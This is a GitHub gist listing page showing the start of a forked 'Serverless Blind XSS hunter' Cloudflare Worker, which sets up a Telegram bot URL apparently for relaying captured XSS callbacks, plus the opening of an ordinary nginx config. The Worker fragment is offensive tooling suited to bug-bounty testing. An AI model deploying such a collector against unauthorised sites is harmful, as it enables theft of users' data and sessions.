Skip to content

Instantly share code, notes, and snippets.

View xynztya's full-sized avatar
💭
I may be slow to respond.

Xynztya xynztya

💭
I may be slow to respond.
View GitHub Profile
@xynztya
xynztya / blind-xss-cloudflare-worker.js
Created December 2, 2022 16:21 — forked from vavkamil/blind-xss-cloudflare-worker.js
Serverless Blind XSS hunter with Cloudflare Worker
addEventListener("fetch", event => {
event.respondWith(handleRequest(event.request))
})
////////////////////////////////////////////////////////////////////////////////////////////////////
// ! DON'T LEAK THE SECRETS !
// Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/
const telegram_token = "*****REDACTED*****";
const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage";
@xynztya
xynztya / nginx.conf
Created March 9, 2020 11:45 — forked from utahta/nginx.conf
nginx + php-fpm + reverse proxy
user nginx;
worker_processes 2;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}